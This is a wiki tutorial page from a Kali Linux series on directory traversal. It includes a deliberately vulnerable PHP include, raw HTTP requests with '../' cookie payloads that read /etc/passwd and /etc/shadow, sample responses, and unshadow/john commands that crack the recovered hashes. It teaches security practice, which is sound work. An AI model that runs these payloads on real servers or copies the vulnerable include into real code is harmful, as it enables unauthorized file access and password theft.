Kali Linux: Web Directory Traversal Vulnerability (en)

From OnnoWiki
Revision as of 05:27, 4 January 2025 by Onnowpurbo (talk | contribs) (Created page with "Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "travers...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "traverse to parent directory" passed to file APIs.

The goal of this attack is to use misconfigured applications to gain unauthorized access to the file system. This attack exploits the lack of security (although the software acts exactly as it should) differently from exploiting bugs in code.

Directory traversal is also known as ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also considered canonicalization attacks.

Here is a simple example of a vulnerable application in PHP,

```php <?php $template = 'red.php'; if (isset($_COOKIE['TEMPLATE'])) 

  $template = $_COOKIE['TEMPLATE'];

include ("/home/users/phpguru/templates/" . $template); ?> ```

The application could be named, for example, vulnerable.php. Placed under the web folder /var/www/html/vulnerable.php

An attack against this system can be done using the following HTTP request, if you are having trouble you can use

```bash telnet ip-address-server 80 ```

enter/type one by one the sentences below,

``` GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd Cookie: TEMPLATE=../../../../../../../../../etc/shadow ```

Response from ../../etc/passwd approximately:

``` HTTP/1.1 200 OK Date: Fri, 01 Jun 2018 23:21:52 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 2164 Connection: close Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin .. .. dst ```

The repeated ../ characters after /home/users/phpguru/templates/ cause include() to traverse to the root directory, then include the Unix password file /etc/passwd.

The /etc/passwd file is typically used for directory traversal examples, and indeed is often used by crackers trying to break in.

On modern Linux/Unix systems, the /etc/passwd file does not contain passwords. Passwords are in the shadow file, which is usually only accessible by root. If the server admin is somewhat careless, and changes permissions, for example,

```bash sudo su chmod 644 /etc/shadow ```

then the command ../../etc/shadow will yield, for example,

``` HTTP/1.1 200 OK Date: Fri, 01 Jun 2018 23:26:47 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 1767 Connection: close Content-Type: text/html; charset=UTF-8

root:!:17273:0:99999:7::: daemon:*:16911:0:99999:7::: bin:*:16911:0:99999:7::: sys:*:16911:0:99999:7::: sync:*:16911:0:99999:7::: games:*:16911:0:99999:7::: man:*:16911:0:99999:7::: lp:*:16911:0:99999:7::: mail:*:16911:0:99999:7::: news:*:16911:0:99999:7::: uucp:*:16911:0:99999:7::: .. .. etc ```

Collect both outputs, for example, output of /etc/password in passwd.txt output of /etc/shadow in shadow.txt with these two files then we can crack using john

```bash unshadow passwd.txt shadow.txt > mypasswd john mypasswd ```

The result will be passwords cracked, approximately

``` Created directory: /root/.john Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status 123456 (redi) 123456 (krida) 123456 (onno) 123456 (pangtni) 123456 (kasum) 123456 (dansatsiber) 6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green Use the "--show" option to display all of the cracked passwords reliably ```


Admin Mistakes

  • Introducing vulnerable PHP
  • A critical admin mistake is typing
sudo su
chmod 644 /etc/shadow

```

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Kali_Linux:_Web_Directory_Traversal_Vulnerability_(en)&oldid=71369"